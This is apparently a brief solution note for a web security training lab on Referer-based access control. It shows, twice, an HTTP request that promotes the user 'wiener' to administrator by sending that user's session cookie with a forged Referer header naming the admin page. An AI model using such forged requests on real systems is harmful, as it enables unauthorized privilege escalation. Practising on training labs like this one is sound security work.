13 - Referer-based access control
GET /admin-roles?username=wiener&action=upgrade
Cookie: session=Cookie de wiener
Referer: https://0ac500e2033ebb6c81fc847300d5008f.web-security-academy.net/admin
GET /admin-roles?username=wiener&action=upgrade
Cookie: session=Cookie de wiener
Referer: https://0ac500e2033ebb6c81fc847300d5008f.web-security-academy.net/admin